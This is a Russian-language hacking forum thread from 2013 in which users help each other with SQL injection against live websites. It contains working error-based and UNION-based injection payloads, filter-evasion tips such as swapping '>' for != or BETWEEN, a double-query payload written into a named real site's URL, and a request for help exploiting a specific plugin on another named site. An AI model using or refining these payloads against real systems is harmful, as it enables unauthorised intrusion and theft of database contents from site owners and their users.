07.04.2013, 10:05
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами:
9228480
Репутация:
0
|
|
Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x25757365727325)and( data_length>0)))))='
ответ выдает ошибку syntax to use near ';0)))))='1'
скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на > и обваливается
Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?
|
|
|
07.04.2013, 10:53
|
|
Участник форума
Регистрация: 10.01.2013
Сообщений: 100
С нами:
7019606
Репутация:
27
|
|
Сообщение от Sanic1977
Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x25757365727325)and( data_length>0)))))='
ответ выдает ошибку syntax to use near ';0)))))='1'
скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на > и обваливается
Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?
попробуй вместо > подставить !=
|
|
|
|
07.04.2013, 10:56
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами:
9228480
Репутация:
0
|
|
Сообщение от BlackIce
попробуй вместо > подставить !=
да об этом знаю. работает только ответ Subquery returns more than 1 row
а как сделать на интервале 0..10 или
like(0x25757365727325)and( data_length>0)and( data_length
|
|
|
|
07.04.2013, 11:14
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
[QUOTE="Sanic1977"]
да об этом знаю. работает только ответ Subquery returns more than 1 row
а как сделать на интервале 0..10 или
like(0x25757365727325)and( data_length>0)and( data_length0)and( data_length
|
|
|
|
07.04.2013, 11:39
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами:
9228480
Репутация:
0
|
|
Сообщение от BigBear
data_length not in (0)
data_length between (0) and (10)
такая конструкция не работает
выдает syntax to use near 'between((0)and(10))))))='1
|
|
|
|
07.04.2013, 18:55
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Sanic1977
такая конструкция не работает
выдает syntax to use near 'between
(
(0)and(10)
)
))))='1
between(0)and(10)))))='1
|
|
|
|
07.04.2013, 22:41
|
|
Новичок
Регистрация: 30.03.2013
Сообщений: 0
С нами:
6905846
Репутация:
0
|
|
как можно раскрутить highlight.php ??
например http://www.itwire .com/plugins/system/highlight/highlight.php
Уязвимость > http://1337day.com/exploit/description/20447
Хотя-бы намёк дайте,пожалуйста.
|
|
|
|
11.04.2013, 12:34
|
|
Познающий
Регистрация: 23.10.2011
Сообщений: 71
С нами:
7660406
Репутация:
3
|
|
http://animemagazine.info/index.php?productID=1+order+by+4+--+
http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+
Тело письма говорит
Как вывести принтабельные поля?
|
|
|
|
11.04.2013, 13:05
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Улыбайся
http://animemagazine.info/index.php?productID=1+order+by+4+--+
http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+
Тело письма говорит
Как вывести принтабельные поля?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//animemagazine.info/index.php?productID=1%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
|
|
|
|
11.04.2013, 15:13
|
|
Новичок
Регистрация: 14.09.2010
Сообщений: 1
С нами:
8242166
Репутация:
0
|
|
Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
